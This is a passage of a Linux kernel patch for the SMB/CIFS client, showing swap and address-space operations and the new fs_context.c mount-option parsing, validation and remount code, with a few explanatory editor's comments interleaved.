++	pr_warn_once("Swap support over SMB3 is experimental\n");
++
++	/*
++	 * TODO: consider adding ACL (or documenting how) to prevent other
++	 * users (on this or other systems) from reading it
++	 */
++
++	/* TODO: add sk_set_memalloc(inet) or similar */
++
++	if (cfile)
++		cfile->swapfile = true;
++	/*
++	 * TODO: Since file already open, we can't open with DENY_ALL here
++	 * but we could add call to grab a byte range lock to prevent others
++	 * from reading or writing the file
++	 */
++
++	sis->flags |= SWP_FS_OPS;
++	return add_swap_extent(sis, 0, sis->max, 0);
++}
++
++static void cifs_swap_deactivate(struct file *file)
++{
++	struct cifsFileInfo *cfile = file->private_data;
++
++	cifs_dbg(FYI, "swap deactivate\n");
++
++	/* TODO: undo sk_set_memalloc(inet) will eventually be needed */
++
++	if (cfile)
++		cfile->swapfile = false;
++
++	/* do we need to unpin (or unlock) the file */
++}
++
++/*
++ * Mark a page as having been made dirty and thus needing writeback.  We also
++ * need to pin the cache object to write back to.
++ */
++#ifdef CONFIG_CIFS_FSCACHE
++static bool cifs_dirty_folio(struct address_space *mapping, struct folio *folio)
++{
++	return fscache_dirty_folio(mapping, folio,
++					cifs_inode_cookie(mapping->host));
++}
++#else
++#define cifs_dirty_folio filemap_dirty_folio
++#endif
++
++const struct address_space_operations cifs_addr_ops = {
++	.read_folio = cifs_read_folio,
++	.readahead = cifs_readahead,
++	.writepage = cifs_writepage,
++	.writepages = cifs_writepages,
++	.write_begin = cifs_write_begin,
++	.write_end = cifs_write_end,
++	.dirty_folio = cifs_dirty_folio,
++	.release_folio = cifs_release_folio,
++	.direct_IO = cifs_direct_io,
++	.invalidate_folio = cifs_invalidate_folio,
++	.launder_folio = cifs_launder_folio,
++	/*
++	 * TODO: investigate and if useful we could add a cifs_migratePage
++	 * helper (under a CONFIG_MIGRATION) in the future, and also
++	 * investigate and add an is_dirty_writeback helper if needed
++	 */
++	.swap_activate = cifs_swap_activate,
++	.swap_deactivate = cifs_swap_deactivate,
++};
++
++/*
++ * cifs_readahead requires the server to support a buffer large enough to
++ * contain the header plus one complete page of data.  Otherwise, we need
++ * to leave cifs_readahead out of the address space operations.
++ */
++const struct address_space_operations cifs_addr_ops_smallbuf = {
++	.read_folio = cifs_read_folio,
++	.writepage = cifs_writepage,
++	.writepages = cifs_writepages,
++	.write_begin = cifs_write_begin,
++	.write_end = cifs_write_end,
++	.dirty_folio = cifs_dirty_folio,
++	.release_folio = cifs_release_folio,
++	.invalidate_folio = cifs_invalidate_folio,
++	.launder_folio = cifs_launder_folio,
++};
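++
++/*
++ * Editor's note (illustrative, not part of the original patch): a minimal
++ * sketch of how a caller might pick between the two tables, assuming the
++ * negotiated buffer size is available as server->maxBuf:
++ *
++ *	if (server->maxBuf >= PAGE_SIZE + MAX_CIFS_HDR_SIZE)
++ *		inode->i_mapping->a_ops = &cifs_addr_ops;
++ *	else
++ *		inode->i_mapping->a_ops = &cifs_addr_ops_smallbuf;
++ *
++ * The actual selection logic lives elsewhere in the client; the predicate
++ * above is an assumption for illustration only.
++ */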
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+new file mode 100644
+index 0000000000000..e2e2ef0fa9a0f
+--- /dev/null
++++ b/fs/smb/client/fs_context.c
+@@ -0,0 +1,1773 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2020, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ *              David Howells <dhowells@redhat.com>
++ */
++
++/*
++#include <linux/module.h>
++#include <linux/nsproxy.h>
++#include <linux/slab.h>
++#include <linux/magic.h>
++#include <linux/security.h>
++#include <net/net_namespace.h>
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++*/
++
++#include <linux/ctype.h>
++#include <linux/fs_context.h>
++#include <linux/fs_parser.h>
++#include <linux/fs.h>
++#include <linux/mount.h>
++#include <linux/parser.h>
++#include <linux/utsname.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "ntlmssp.h"
++#include "nterr.h"
++#include "rfc1002pdu.h"
++#include "fs_context.h"
++
++static DEFINE_MUTEX(cifs_mount_mutex);
++
++static const match_table_t cifs_smb_version_tokens = {
++	{ Smb_1, SMB1_VERSION_STRING },
++	{ Smb_20, SMB20_VERSION_STRING},
++	{ Smb_21, SMB21_VERSION_STRING },
++	{ Smb_30, SMB30_VERSION_STRING },
++	{ Smb_302, SMB302_VERSION_STRING },
++	{ Smb_302, ALT_SMB302_VERSION_STRING },
++	{ Smb_311, SMB311_VERSION_STRING },
++	{ Smb_311, ALT_SMB311_VERSION_STRING },
++	{ Smb_3any, SMB3ANY_VERSION_STRING },
++	{ Smb_default, SMBDEFAULT_VERSION_STRING },
++	{ Smb_version_err, NULL }
++};
++
++static const match_table_t cifs_secflavor_tokens = {
++	{ Opt_sec_krb5, "krb5" },
++	{ Opt_sec_krb5i, "krb5i" },
++	{ Opt_sec_krb5p, "krb5p" },
++	{ Opt_sec_ntlmsspi, "ntlmsspi" },
++	{ Opt_sec_ntlmssp, "ntlmssp" },
++	{ Opt_sec_ntlmv2, "nontlm" },
++	{ Opt_sec_ntlmv2, "ntlmv2" },
++	{ Opt_sec_ntlmv2i, "ntlmv2i" },
++	{ Opt_sec_none, "none" },
++
++	{ Opt_sec_err, NULL }
++};
++
++const struct fs_parameter_spec smb3_fs_parameters[] = {
++	/* Mount options that take no arguments */
++	fsparam_flag_no("user_xattr", Opt_user_xattr),
++	fsparam_flag_no("forceuid", Opt_forceuid),
++	fsparam_flag_no("multichannel", Opt_multichannel),
++	fsparam_flag_no("forcegid", Opt_forcegid),
++	fsparam_flag("noblocksend", Opt_noblocksend),
++	fsparam_flag("noautotune", Opt_noautotune),
++	fsparam_flag("nolease", Opt_nolease),
++	fsparam_flag_no("hard", Opt_hard),
++	fsparam_flag_no("soft", Opt_soft),
++	fsparam_flag_no("perm", Opt_perm),
++	fsparam_flag("nodelete", Opt_nodelete),
++	fsparam_flag_no("mapposix", Opt_mapposix),
++	fsparam_flag("mapchars", Opt_mapchars),
++	fsparam_flag("nomapchars", Opt_nomapchars),
++	fsparam_flag_no("sfu", Opt_sfu),
++	fsparam_flag("nodfs", Opt_nodfs),
++	fsparam_flag_no("posixpaths", Opt_posixpaths),
++	fsparam_flag_no("unix", Opt_unix),
++	fsparam_flag_no("linux", Opt_unix),
++	fsparam_flag_no("posix", Opt_unix),
++	fsparam_flag("nocase", Opt_nocase),
++	fsparam_flag("ignorecase", Opt_nocase),
++	fsparam_flag_no("brl", Opt_brl),
++	fsparam_flag_no("handlecache", Opt_handlecache),
++	fsparam_flag("forcemandatorylock", Opt_forcemandatorylock),
++	fsparam_flag("forcemand", Opt_forcemandatorylock),
++	fsparam_flag("setuidfromacl", Opt_setuidfromacl),
++	fsparam_flag("idsfromsid", Opt_setuidfromacl),
++	fsparam_flag_no("setuids", Opt_setuids),
++	fsparam_flag_no("dynperm", Opt_dynperm),
++	fsparam_flag_no("intr", Opt_intr),
++	fsparam_flag_no("strictsync", Opt_strictsync),
++	fsparam_flag_no("serverino", Opt_serverino),
++	fsparam_flag("rwpidforward", Opt_rwpidforward),
++	fsparam_flag("cifsacl", Opt_cifsacl),
++	fsparam_flag_no("acl", Opt_acl),
++	fsparam_flag("locallease", Opt_locallease),
++	fsparam_flag("sign", Opt_sign),
++	fsparam_flag("ignore_signature", Opt_ignore_signature),
++	fsparam_flag("signloosely", Opt_ignore_signature),
++	fsparam_flag("seal", Opt_seal),
++	fsparam_flag("noac", Opt_noac),
++	fsparam_flag("fsc", Opt_fsc),
++	fsparam_flag("mfsymlinks", Opt_mfsymlinks),
++	fsparam_flag("multiuser", Opt_multiuser),
++	fsparam_flag("sloppy", Opt_sloppy),
++	fsparam_flag("nosharesock", Opt_nosharesock),
++	fsparam_flag_no("persistenthandles", Opt_persistent),
++	fsparam_flag_no("resilienthandles", Opt_resilient),
++	fsparam_flag_no("tcpnodelay", Opt_tcp_nodelay),
++	fsparam_flag("nosparse", Opt_nosparse),
++	fsparam_flag("domainauto", Opt_domainauto),
++	fsparam_flag("rdma", Opt_rdma),
++	fsparam_flag("modesid", Opt_modesid),
++	fsparam_flag("modefromsid", Opt_modesid),
++	fsparam_flag("rootfs", Opt_rootfs),
++	fsparam_flag("compress", Opt_compress),
++	fsparam_flag("witness", Opt_witness),
++
++	/* Mount options which take numeric value */
++	fsparam_u32("backupuid", Opt_backupuid),
++	fsparam_u32("backupgid", Opt_backupgid),
++	fsparam_u32("uid", Opt_uid),
++	fsparam_u32("cruid", Opt_cruid),
++	fsparam_u32("gid", Opt_gid),
++	fsparam_u32("file_mode", Opt_file_mode),
++	fsparam_u32("dirmode", Opt_dirmode),
++	fsparam_u32("dir_mode", Opt_dirmode),
++	fsparam_u32("port", Opt_port),
++	fsparam_u32("min_enc_offload", Opt_min_enc_offload),
++	fsparam_u32("esize", Opt_min_enc_offload),
++	fsparam_u32("bsize", Opt_blocksize),
++	fsparam_u32("rasize", Opt_rasize),
++	fsparam_u32("rsize", Opt_rsize),
++	fsparam_u32("wsize", Opt_wsize),
++	fsparam_u32("actimeo", Opt_actimeo),
++	fsparam_u32("acdirmax", Opt_acdirmax),
++	fsparam_u32("acregmax", Opt_acregmax),
++	fsparam_u32("closetimeo", Opt_closetimeo),
++	fsparam_u32("echo_interval", Opt_echo_interval),
++	fsparam_u32("max_credits", Opt_max_credits),
++	fsparam_u32("handletimeout", Opt_handletimeout),
++	fsparam_u64("snapshot", Opt_snapshot),
++	fsparam_u32("max_channels", Opt_max_channels),
++
++	/* Mount options which take string value */
++	fsparam_string("source", Opt_source),
++	fsparam_string("user", Opt_user),
++	fsparam_string("username", Opt_user),
++	fsparam_string("pass", Opt_pass),
++	fsparam_string("password", Opt_pass),
++	fsparam_string("ip", Opt_ip),
++	fsparam_string("addr", Opt_ip),
++	fsparam_string("domain", Opt_domain),
++	fsparam_string("dom", Opt_domain),
++	fsparam_string("srcaddr", Opt_srcaddr),
++	fsparam_string("iocharset", Opt_iocharset),
++	fsparam_string("netbiosname", Opt_netbiosname),
++	fsparam_string("servern", Opt_servern),
++	fsparam_string("ver", Opt_ver),
++	fsparam_string("vers", Opt_vers),
++	fsparam_string("sec", Opt_sec),
++	fsparam_string("cache", Opt_cache),
++
++	/* Arguments that should be ignored */
++	fsparam_flag("guest", Opt_ignore),
++	fsparam_flag("noatime", Opt_ignore),
++	fsparam_flag("relatime", Opt_ignore),
++	fsparam_flag("_netdev", Opt_ignore),
++	fsparam_flag_no("suid", Opt_ignore),
++	fsparam_flag_no("exec", Opt_ignore),
++	fsparam_flag_no("dev", Opt_ignore),
++	fsparam_flag_no("mand", Opt_ignore),
++	fsparam_flag_no("auto", Opt_ignore),
++	fsparam_string("cred", Opt_ignore),
++	fsparam_string("credentials", Opt_ignore),
++	/*
++	 * UNC and prefixpath are now extracted from Opt_source
++	 * in the new mount API so we can just ignore them going forward.
++	 */
++	fsparam_string("unc", Opt_ignore),
++	fsparam_string("prefixpath", Opt_ignore),
++	{}
++};
++
++static int
++cifs_parse_security_flavors(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
++{
++	substring_t args[MAX_OPT_ARGS];
++
++	/*
++	 * With mount options, the last one should win. Reset any existing
++	 * settings back to default.
++	 */
++	ctx->sectype = Unspecified;
++	ctx->sign = false;
++
++	switch (match_token(value, cifs_secflavor_tokens, args)) {
++	case Opt_sec_krb5p:
++		cifs_errorf(fc, "sec=krb5p is not supported!\n");
++		return 1;
++	case Opt_sec_krb5i:
++		ctx->sign = true;
++		fallthrough;
++	case Opt_sec_krb5:
++		ctx->sectype = Kerberos;
++		break;
++	case Opt_sec_ntlmsspi:
++		ctx->sign = true;
++		fallthrough;
++	case Opt_sec_ntlmssp:
++		ctx->sectype = RawNTLMSSP;
++		break;
++	case Opt_sec_ntlmv2i:
++		ctx->sign = true;
++		fallthrough;
++	case Opt_sec_ntlmv2:
++		ctx->sectype = NTLMv2;
++		break;
++	case Opt_sec_none:
++		ctx->nullauth = 1;
++		break;
++	default:
++		cifs_errorf(fc, "bad security option: %s\n", value);
++		return 1;
++	}
++
++	return 0;
++}
++
++static const match_table_t cifs_cacheflavor_tokens = {
++	{ Opt_cache_loose, "loose" },
++	{ Opt_cache_strict, "strict" },
++	{ Opt_cache_none, "none" },
++	{ Opt_cache_ro, "ro" },
++	{ Opt_cache_rw, "singleclient" },
++	{ Opt_cache_err, NULL }
++};
++
++static int
++cifs_parse_cache_flavor(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
++{
++	substring_t args[MAX_OPT_ARGS];
++
++	switch (match_token(value, cifs_cacheflavor_tokens, args)) {
++	case Opt_cache_loose:
++		ctx->direct_io = false;
++		ctx->strict_io = false;
++		ctx->cache_ro = false;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_strict:
++		ctx->direct_io = false;
++		ctx->strict_io = true;
++		ctx->cache_ro = false;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_none:
++		ctx->direct_io = true;
++		ctx->strict_io = false;
++		ctx->cache_ro = false;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_ro:
++		ctx->direct_io = false;
++		ctx->strict_io = false;
++		ctx->cache_ro = true;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_rw:
++		ctx->direct_io = false;
++		ctx->strict_io = false;
++		ctx->cache_ro = false;
++		ctx->cache_rw = true;
++		break;
++	default:
++		cifs_errorf(fc, "bad cache= option: %s\n", value);
++		return 1;
++	}
++	return 0;
++}
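++
++/*
++ * Editor's note (summary, not part of the original patch): the cache=
++ * flavors above map onto the context flags as follows:
++ *
++ *	loose        -> all four flags false
++ *	strict       -> strict_io only
++ *	none         -> direct_io only
++ *	ro           -> cache_ro only
++ *	singleclient -> cache_rw only
++ */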
++
++#define DUP_CTX_STR(field)						\
++do {									\
++	if (ctx->field) {						\
++		new_ctx->field = kstrdup(ctx->field, GFP_ATOMIC);	\
++		if (new_ctx->field == NULL) {				\
++			smb3_cleanup_fs_context_contents(new_ctx);	\
++			return -ENOMEM;					\
++		}							\
++	}								\
++} while (0)
++
++int
++smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx)
++{
++	memcpy(new_ctx, ctx, sizeof(*ctx));
++	new_ctx->prepath = NULL;
++	new_ctx->mount_options = NULL;
++	new_ctx->nodename = NULL;
++	new_ctx->username = NULL;
++	new_ctx->password = NULL;
++	new_ctx->server_hostname = NULL;
++	new_ctx->domainname = NULL;
++	new_ctx->UNC = NULL;
++	new_ctx->source = NULL;
++	new_ctx->iocharset = NULL;
++	/*
++	 * Make sure to stay in sync with smb3_cleanup_fs_context_contents()
++	 */
++	DUP_CTX_STR(prepath);
++	DUP_CTX_STR(mount_options);
++	DUP_CTX_STR(username);
++	DUP_CTX_STR(password);
++	DUP_CTX_STR(server_hostname);
++	DUP_CTX_STR(UNC);
++	DUP_CTX_STR(source);
++	DUP_CTX_STR(domainname);
++	DUP_CTX_STR(nodename);
++	DUP_CTX_STR(iocharset);
++
++	return 0;
++}
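++
++/*
++ * Editor's note (not part of the original patch): the memcpy() above copies
++ * the string pointers of @ctx as well, so each one is reset to NULL before
++ * DUP_CTX_STR() allocates a private copy; otherwise the old and new
++ * contexts would share, and eventually double-free, the same buffers.
++ */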
++
++static int
++cifs_parse_smb_version(struct fs_context *fc, char *value, struct smb3_fs_context *ctx, bool is_smb3)
++{
++	substring_t args[MAX_OPT_ARGS];
++
++	switch (match_token(value, cifs_smb_version_tokens, args)) {
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	case Smb_1:
++		if (disable_legacy_dialects) {
++			cifs_errorf(fc, "mount with legacy dialect disabled\n");
++			return 1;
++		}
++		if (is_smb3) {
++			cifs_errorf(fc, "vers=1.0 (cifs) not permitted when mounting with smb3\n");
++			return 1;
++		}
++		cifs_errorf(fc, "Use of the less secure dialect vers=1.0 is not recommended unless required for access to very old servers\n");
++		ctx->ops = &smb1_operations;
++		ctx->vals = &smb1_values;
++		break;
++	case Smb_20:
++		if (disable_legacy_dialects) {
++			cifs_errorf(fc, "mount with legacy dialect disabled\n");
++			return 1;
++		}
++		if (is_smb3) {
++			cifs_errorf(fc, "vers=2.0 not permitted when mounting with smb3\n");
++			return 1;
++		}
++		ctx->ops = &smb20_operations;
++		ctx->vals = &smb20_values;
++		break;
++#else
++	case Smb_1:
++		cifs_errorf(fc, "vers=1.0 (cifs) mount not permitted when legacy dialects disabled\n");
++		return 1;
++	case Smb_20:
++		cifs_errorf(fc, "vers=2.0 mount not permitted when legacy dialects disabled\n");
++		return 1;
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++	case Smb_21:
++		ctx->ops = &smb21_operations;
++		ctx->vals = &smb21_values;
++		break;
++	case Smb_30:
++		ctx->ops = &smb30_operations;
++		ctx->vals = &smb30_values;
++		break;
++	case Smb_302:
++		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
++		ctx->vals = &smb302_values;
++		break;
++	case Smb_311:
++		ctx->ops = &smb311_operations;
++		ctx->vals = &smb311_values;
++		break;
++	case Smb_3any:
++		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
++		ctx->vals = &smb3any_values;
++		break;
++	case Smb_default:
++		ctx->ops = &smb30_operations;
++		ctx->vals = &smbdefault_values;
++		break;
++	default:
++		cifs_errorf(fc, "Unknown vers= option specified: %s\n", value);
++		return 1;
++	}
++	return 0;
++}
++
++int smb3_parse_opt(const char *options, const char *key, char **val)
++{
++	int rc = -ENOENT;
++	char *opts, *orig, *p;
++
++	orig = opts = kstrdup(options, GFP_KERNEL);
++	if (!opts)
++		return -ENOMEM;
++
++	while ((p = strsep(&opts, ","))) {
++		char *nval;
++
++		if (!*p)
++			continue;
++		if (strncasecmp(p, key, strlen(key)))
++			continue;
++		nval = strchr(p, '=');
++		if (nval) {
++			if (nval == p)
++				continue;
++			*nval++ = 0;
++			*val = kstrdup(nval, GFP_KERNEL);
++			rc = !*val ? -ENOMEM : 0;
++			goto out;
++		}
++	}
++out:
++	kfree(orig);
++	return rc;
++}
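++
++/*
++ * Editor's note (illustrative, not part of the original patch): a minimal
++ * usage sketch, assuming a mount options string is at hand:
++ *
++ *	char *val = NULL;
++ *
++ *	if (!smb3_parse_opt("vers=3.1.1,seal,user=bob", "user", &val)) {
++ *		// use val, which now holds "bob"
++ *		kfree(val);
++ *	}
++ *
++ * The key match is a prefix match (strncasecmp with strlen(key)), so "user"
++ * would also match a "username=" option if it appeared first.
++ */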
++
++/*
++ * Remove duplicate path delimiters. Windows is supposed to do that
++ * but there are some bugs that prevent rename from working if there are
++ * multiple delimiters.
++ *
++ * Returns a sanitized duplicate of @prepath. @gfp indicates the GFP_* flags
++ * for kstrdup.
++ * The caller is responsible for freeing the original.
++ */
++#define IS_DELIM(c) ((c) == '/' || (c) == '\\')
++char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
++{
++	char *cursor1 = prepath, *cursor2 = prepath;
++
++	/* skip all prepended delimiters */
++	while (IS_DELIM(*cursor1))
++		cursor1++;
++
++	/* copy the first letter */
++	*cursor2 = *cursor1;
++
++	/* copy the remainder... */
++	while (*(cursor1++)) {
++		/* ... skipping all duplicated delimiters */
++		if (IS_DELIM(*cursor1) && IS_DELIM(*cursor2))
++			continue;
++		*(++cursor2) = *cursor1;
++	}
++
++	/* if the last character is a delimiter, skip it */
++	if (IS_DELIM(*(cursor2 - 1)))
++		cursor2--;
++
++	*(cursor2) = '\0';
++	return kstrdup(prepath, gfp);
++}
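++
++/*
++ * Editor's note (illustrative, not part of the original patch): an example
++ * of the transformation above:
++ *
++ *	"//dir1///dir2//"  ->  "dir1/dir2"
++ *
++ * with '\' handled identically to '/'. Leading delimiters are skipped,
++ * runs are collapsed to one, and a trailing delimiter is dropped before
++ * the result is duplicated with kstrdup().
++ */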
++
++/*
++ * Parse a devname into substrings and populate the ctx->UNC and ctx->prepath
++ * fields with the result. Returns 0 on success and an error otherwise
++ * (e.g. ENOMEM or EINVAL)
++ */
++int
++smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
++{
++	char *pos;
++	const char *delims = "/\\";
++	size_t len;
++
++	if (unlikely(!devname || !*devname)) {
++		cifs_dbg(VFS, "Device name not specified\n");
++		return -EINVAL;
++	}
++
++	/* make sure we have a valid UNC double delimiter prefix */
++	len = strspn(devname, delims);
++	if (len != 2)
++		return -EINVAL;
++
++	/* find delimiter between host and sharename */
++	pos = strpbrk(devname + 2, delims);
++	if (!pos)
++		return -EINVAL;
++
++	/* record the server hostname */
++	kfree(ctx->server_hostname);
++	ctx->server_hostname = kstrndup(devname + 2, pos - devname - 2, GFP_KERNEL);
++	if (!ctx->server_hostname)
++		return -ENOMEM;
++
++	/* skip past delimiter */
++	++pos;
++
++	/* now go until next delimiter or end of string */
++	len = strcspn(pos, delims);
++
++	/* move "pos" up to the delimiter or the NUL terminator */
++	pos += len;
++	kfree(ctx->UNC);
++	ctx->UNC = kstrndup(devname, pos - devname, GFP_KERNEL);
++	if (!ctx->UNC)
++		return -ENOMEM;
++
++	convert_delimiter(ctx->UNC, '\\');
++
++	/* skip any delimiter */
++	if (*pos == '/' || *pos == '\\')
++		pos++;
++
++	kfree(ctx->prepath);
++	ctx->prepath = NULL;
++
++	/* If *pos is the NUL terminator then there is no prepath */
++	if (!*pos)
++		return 0;
++
++	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
++	if (!ctx->prepath)
++		return -ENOMEM;
++
++	return 0;
++}
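++
++/*
++ * Editor's note (illustrative, not part of the original patch): for a
++ * devname of "//srv/share/sub/dir" the code above produces
++ *
++ *	ctx->server_hostname = "srv"
++ *	ctx->UNC             = "\\srv\share"
++ *	ctx->prepath         = "sub/dir"
++ *
++ * where the UNC delimiters have been converted to backslashes and the
++ * prepath has been sanitized.
++ */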
++
++static void smb3_fs_context_free(struct fs_context *fc);
++static int smb3_fs_context_parse_param(struct fs_context *fc,
++				       struct fs_parameter *param);
++static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
++					    void *data);
++static int smb3_get_tree(struct fs_context *fc);
++static int smb3_reconfigure(struct fs_context *fc);
++
++static const struct fs_context_operations smb3_fs_context_ops = {
++	.free			= smb3_fs_context_free,
++	.parse_param		= smb3_fs_context_parse_param,
++	.parse_monolithic	= smb3_fs_context_parse_monolithic,
++	.get_tree		= smb3_get_tree,
++	.reconfigure		= smb3_reconfigure,
++};
++
++/*
++ * smb3_fs_context_parse_monolithic - Parse key[=val][,key[=val]]* mount data
++ * @fc: The filesystem context to fill in.
++ * @data: The data to parse
++ *
++ * Parse a monolithic block of data from sys_mount(), i.e. a blob in
++ * key[=val][,key[=val]]* form.  This can be called from the
++ * ->monolithic_mount_data() fs_context operation.
++ *
++ * Returns 0 on success or the error returned by the ->parse_option()
++ * fs_context operation on failure.
++ */
++static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
++					   void *data)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	char *options = data, *key;
++	int ret = 0;
++
++	if (!options)
++		return 0;
++
++	ctx->mount_options = kstrdup(data, GFP_KERNEL);
++	if (ctx->mount_options == NULL)
++		return -ENOMEM;
++
++	ret = security_sb_eat_lsm_opts(options, &fc->security);
++	if (ret)
++		return ret;
++
++	/* BB Need to add support for sep= here TBD */
++	while ((key = strsep(&options, ",")) != NULL) {
++		size_t len;
++		char *value;
++
++		if (*key == 0)
++			break;
++
++		/* Check if the following character is the delimiter. If yes,
++		 * we have encountered a double delimiter; reset the NUL
++		 * character to the delimiter.
++		 */
++		while (options && options[0] == ',') {
++			len = strlen(key);
++			strcpy(key + len, options);
++			options = strchr(options, ',');
++			if (options)
++				*options++ = 0;
++		}
++
++		len = 0;
++		value = strchr(key, '=');
++		if (value) {
++			if (value == key)
++				continue;
++			*value++ = 0;
++			len = strlen(value);
++		}
++
++		ret = vfs_parse_fs_string(fc, key, value, len);
++		if (ret < 0)
++			break;
++	}
++
++	return ret;
++}
++
++/*
++ * Validate the preparsed information in the config.
++ */
++static int smb3_fs_context_validate(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++
++	if (ctx->rdma && ctx->vals->protocol_id < SMB30_PROT_ID) {
++		cifs_errorf(fc, "SMB Direct requires Version >=3.0\n");
++		return -EOPNOTSUPP;
++	}
++
++#ifndef CONFIG_KEYS
++	/* Multiuser mounts require CONFIG_KEYS support */
++	if (ctx->multiuser) {
++		cifs_errorf(fc, "Multiuser mounts require kernels with CONFIG_KEYS enabled\n");
++		return -1;
++	}
++#endif
++
++	if (ctx->got_version == false)
++		pr_warn_once("No dialect specified on mount. Default has changed to a more secure dialect, SMB2.1 or later (e.g. SMB3.1.1), from CIFS (SMB1). To use the less secure SMB1 dialect to access old servers which do not support SMB3.1.1 (or even SMB3 or SMB2.1) specify vers=1.0 on mount.\n");
++
++	if (!ctx->UNC) {
++		cifs_errorf(fc, "CIFS mount error: No usable UNC path provided in device string!\n");
++		return -1;
++	}
++
++	/* make sure UNC has a share name */
++	if (strlen(ctx->UNC) < 3 || !strchr(ctx->UNC + 3, '\\')) {
++		cifs_errorf(fc, "Malformed UNC. Unable to find share name.\n");
++		return -ENOENT;
++	}
++
++	if (!ctx->got_ip) {
++		int len;
++		const char *slash;
++
++		/* No ip= option specified? Try to get it from UNC */
++		/* Use the address part of the UNC. */
++		slash = strchr(&ctx->UNC[2], '\\');
++		len = slash - &ctx->UNC[2];
++		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
++					  &ctx->UNC[2], len)) {
++			pr_err("Unable to determine destination address\n");
++			return -EHOSTUNREACH;
++		}
++	}
++
++	/* set the port that we got earlier */
++	cifs_set_port((struct sockaddr *)&ctx->dstaddr, ctx->port);
++
++	if (ctx->override_uid && !ctx->uid_specified) {
++		ctx->override_uid = 0;
++		pr_notice("ignoring forceuid mount option specified with no uid= option\n");
++	}
++
++	if (ctx->override_gid && !ctx->gid_specified) {
++		ctx->override_gid = 0;
++		pr_notice("ignoring forcegid mount option specified with no gid= option\n");
++	}
++
++	return 0;
++}
++
++static int smb3_get_tree_common(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	struct dentry *root;
++	int rc = 0;
++
++	root = cifs_smb3_do_mount(fc->fs_type, 0, ctx);
++	if (IS_ERR(root))
++		return PTR_ERR(root);
++
++	fc->root = root;
++
++	return rc;
++}
++
++/*
++ * Create an SMB3 superblock from the parameters passed.
++ */
++static int smb3_get_tree(struct fs_context *fc)
++{
++	int err = smb3_fs_context_validate(fc);
++	int ret;
++
++	if (err)
++		return err;
++	mutex_lock(&cifs_mount_mutex);
++	ret = smb3_get_tree_common(fc);
++	mutex_unlock(&cifs_mount_mutex);
++	return ret;
++}
++
++static void smb3_fs_context_free(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++
++	smb3_cleanup_fs_context(ctx);
++}
++
++/*
++ * Compare the old and new proposed context during reconfigure
++ * and check if the changes are compatible.
++ */
++static int smb3_verify_reconfigure_ctx(struct fs_context *fc,
++				       struct smb3_fs_context *new_ctx,
++				       struct smb3_fs_context *old_ctx)
++{
++	if (new_ctx->posix_paths != old_ctx->posix_paths) {
++		cifs_errorf(fc, "can not change posixpaths during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->sectype != old_ctx->sectype) {
++		cifs_errorf(fc, "can not change sec during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->multiuser != old_ctx->multiuser) {
++		cifs_errorf(fc, "can not change multiuser during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->UNC &&
++	    (!old_ctx->UNC || strcmp(new_ctx->UNC, old_ctx->UNC))) {
++		cifs_errorf(fc, "can not change UNC during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->username &&
++	    (!old_ctx->username || strcmp(new_ctx->username, old_ctx->username))) {
++		cifs_errorf(fc, "can not change username during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->password &&
++	    (!old_ctx->password || strcmp(new_ctx->password, old_ctx->password))) {
++		cifs_errorf(fc, "can not change password during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->domainname &&
++	    (!old_ctx->domainname || strcmp(new_ctx->domainname, old_ctx->domainname))) {
++		cifs_errorf(fc, "can not change domainname during remount\n");
++		return -EINVAL;
++	}
++	if (strcmp(new_ctx->workstation_name, old_ctx->workstation_name)) {
++		cifs_errorf(fc, "can not change workstation_name during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->nodename &&
++	    (!old_ctx->nodename || strcmp(new_ctx->nodename, old_ctx->nodename))) {
++		cifs_errorf(fc, "can not change nodename during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->iocharset &&
++	    (!old_ctx->iocharset || strcmp(new_ctx->iocharset, old_ctx->iocharset))) {
++		cifs_errorf(fc, "can not change iocharset during remount\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++#define STEAL_STRING(cifs_sb, ctx, field)				\
++do {									\
++	kfree(ctx->field);						\
++	ctx->field = cifs_sb->ctx->field;				\
++	cifs_sb->ctx->field = NULL;					\
++} while (0)
++
++#define STEAL_STRING_SENSITIVE(cifs_sb, ctx, field)			\
++do {									\
++	kfree_sensitive(ctx->field);					\
++	ctx->field = cifs_sb->ctx->field;				\
++	cifs_sb->ctx->field = NULL;					\
++} while (0)
++
++static int smb3_reconfigure(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	struct dentry *root = fc->root;
